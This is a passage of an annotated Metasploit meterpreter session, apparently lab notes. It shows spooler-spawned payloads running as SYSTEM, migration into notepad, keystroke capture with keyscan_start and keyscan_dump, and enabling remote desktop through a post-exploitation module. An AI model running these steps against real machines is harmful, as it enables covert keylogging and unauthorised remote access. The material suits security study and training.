532 516 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
580 972 dwm.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\Dwm.exe
584 524 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
592 524 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
600 524 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
700 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
760 584 ibmpmsvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\ibmpmsvc.exe
792 584 LPlatSvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\LPlatSvc.exe
800 584 PresentationFontCache.exe x64 0 NT AUTHORITY\LOCAL SERVICE
872 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
920 1144 igfxEM.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxEM.exe
936 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
972 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1000 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1028 1120 RAVBg64.exe x64 1 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
1060 584 igfxCUIService.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\igfxCUIService.exe
1112 1144 igfxHK.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxHK.exe
1120 584 RtkAudioService64.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
1176 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1256 516 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
1368 1928 explorer.exe x64 1 yuanan-PC\yuanan C:\Windows\Explorer.EXE
1416 1144 igfxTray.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxTray.exe
1440 584 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1488 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1552 1440 PDMQlQpOYKl.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\PDMQlQpOYKl.exe
1720 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1904 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1936 1000 taskeng.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskeng.exe
2236 1440 nDjWCo.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\nDjWCo.exe
2256 1368 notepad.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\NOTEPAD.EXE
2284 584 wmpnetwk.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2288 792 LPlatSvc.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\LPlatSvc.exe
2296 584 taskhost.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskhost.exe
2400 2672 SearchFilterHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchFilterHost.exe
2532 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2568 584 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2608 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2672 584 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
3100 1936 RAVBg64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
3164 3112 RAVCpl64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
3500 1440 HPGNJDtrnf.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\HPGNJDtrnf.exe
4052 2672 SearchProtocolHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchProtocolHost.exe
## 转移至记事本的进程号
meterpreter > migrate 2256
[*] Migrating from 1440 to 2256...
[*] Migration completed successfully.
meterpreter >
meterpreter > key
keyboard_send keyevent keyscan_dump keyscan_start keyscan_stop
## 开启键盘抓取
meterpreter > keyscan_start
Starting the keystroke sniffer ...
## dump键盘操作记录
meterpreter > keyscan_dump
Dumping captured keystrokes...
jhgjhgjhghjgjhllll<CR>
<CR>
<CR>
<CR>
1dsds<CR>
## 结束键盘抓取
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >
启远程桌面
run post/windows/manage/enable_rdp